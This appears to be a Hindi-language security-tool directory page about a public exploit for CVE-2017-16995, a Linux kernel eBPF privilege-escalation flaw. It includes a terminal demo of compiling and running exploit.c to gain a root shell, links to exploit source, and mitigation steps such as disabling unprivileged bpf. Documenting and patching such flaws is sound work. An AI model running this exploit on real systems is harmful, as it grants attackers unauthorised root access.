Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-16995 — लिनक्स कर्नेल संस्करण 4.14 - 4.4 (Ubuntu && Debian) | Kitploit
उपकरण/GitHubGitHub/c0dak/cve-2017-16995
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubc0dak/cve-2017-16995

CVE-2017-16995

लिनक्स कर्नेल संस्करण 4.14 - 4.4 (Ubuntu && Debian)

रिपॉजिटरी देखें
1518 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

लिनक्स कर्नेल संस्करण 4.14 - 4.4 (Ubuntu && Debian)

विवरण

यह कमजोरी Linux कर्नेल में eBPF bpf(2) सिस्टम कॉल में मौजूद है, जब उपयोगकर्ता एक दुर्भावनापूर्ण BPF प्रोग्राम प्रदान करता है जो eBPF सत्यापनकर्ता मॉड्यूल में गणना त्रुटि उत्पन्न करता है, जिससे मनमानी मेमोरी रीड/राइट समस्या होती है। गैर-विशेषाधिकार प्राप्त उपयोगकर्ता इस कमजोरी का उपयोग करके विशेषाधिकार वृद्धि प्राप्त कर सकते हैं। कमजोरी Google Project Zero द्वारा खोजी गई।

कमजोरी संख्या

CVE-2017-16995

खतरा स्तर

उच्च जोखिम

प्रदर्शन

root@kitploit:~
bearcat@ubuntu:/opt$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 16.04.4 LTS
Release:        16.04
Codename:       xenial
bearcat@ubuntu:/opt$ uname -a
Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bearcat@ubuntu:/opt$ id
uid=1000(bearcat) gid=1000(bearcat) groups=1000(bearcat),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
bearcat@ubuntu:/opt$ ls
exploit.c
bearcat@ubuntu:/opt$ gcc exploit.c -o exploit
bearcat@ubuntu:/opt$ ./exploit
task_struct = ffff88003a0db800
uidptr = ffff8800374b76c4
spawning root shell
root@ubuntu:/opt# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(bearcat)
root@ubuntu:/opt#

सुधार सुझाव

  1. फिलहाल कोई स्पष्ट पैच अपग्रेड समाधान नहीं है। उपयोगकर्ताओं को सलाह दी जाती है कि वे जोखिम का आकलन करने के बाद, कर्नेल पैरामीटर को संशोधित करके सामान्य उपयोगकर्ताओं के लिए bpf(2) सिस्टम कॉल के उपयोग को प्रतिबंधित करें:

पैरामीटर 'kernel.unprivileged_bpf_disabled = 1' सेट करें, जो bpf(2) कॉल तक पहुंच को प्रतिबंधित करके इस विशेषाधिकार वृद्धि को रोकता है।

 root@Ubuntu# echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled

  1. संबंधित कोड पैच https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

संबंधित लिंक

http://cyseclabs.com/exploits/upstream44.c

https://security-tracker.debian.org/tracker/CVE-2017-16995

https://www.securityfocus.com/bid/102288

https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor?utmcampaign=General%20website&utmcontent=67375488&utmmedium=social&utmsource=twitter

https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f

https://cert.360.cn/warning/detail?id=119f849891f2a1b5deef65f99923ab5a

https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

https://github.com/jas502n/Ubuntu-0day

टूल डाउनलोड करें